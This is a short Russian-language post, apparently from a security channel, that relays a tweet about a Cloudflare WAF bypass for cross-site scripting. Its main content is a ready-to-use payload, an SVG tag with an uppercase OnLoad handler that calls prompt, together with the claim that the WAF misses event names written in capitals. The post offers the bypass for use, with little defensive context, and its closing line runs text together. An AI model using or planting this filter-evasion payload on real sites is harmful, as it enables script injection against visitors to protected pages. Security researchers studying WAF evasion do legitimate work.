#xss #bypass
Мой хороший друг Богдан твитнул новый байпас для cf. И правда довольно странно что он не тригерит на большие буквы:
New Cloudflare XSS Bypass:
<svg/OnLoad="`${prompt``}`">
Proof:
тыкA strange new solution from Cloudflare engineers. WAF will be weakened if DOM event has uppercase.